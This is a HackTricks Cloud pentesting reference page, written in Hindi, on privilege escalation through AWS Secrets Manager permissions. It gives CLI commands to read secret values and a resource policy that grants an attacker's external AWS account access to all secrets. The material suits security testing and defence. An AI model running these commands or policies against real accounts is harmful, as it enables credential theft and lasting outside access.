Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md

2.2 KiB

AWS - Secrets Manager Privesc

{{#include ../../../banners/hacktricks-training.md}}

Secrets Manager

Secrets manager के बारे में अधिक जानकारी के लिए देखें:

{{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}}

secretsmanager:GetSecretValue

इस अनुमति के साथ एक हमलावर AWS Secretsmanager में एक रहस्य के अंदर सहेजा गया मान प्राप्त कर सकता है।

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

संभावित प्रभाव: AWS सीक्रेट्स मैनेजर सेवा के अंदर उच्च संवेदनशील डेटा तक पहुंच प्राप्त करना।

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

पिछले अनुमतियों के साथ, यह संभव है कि अन्य प्रिंसिपल/खातों (यहां तक कि बाहरी) को गुप्त तक पहुंच देने के लिए। ध्यान दें कि KMS कुंजी के साथ एन्क्रिप्ट किए गए गुप्तों को पढ़ने के लिए, उपयोगकर्ता को KMS कुंजी पर पहुंच भी होनी चाहिए (अधिक जानकारी के लिए KMS Enum पृष्ठ देखें)।

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

{{#include ../../../banners/hacktricks-training.md}}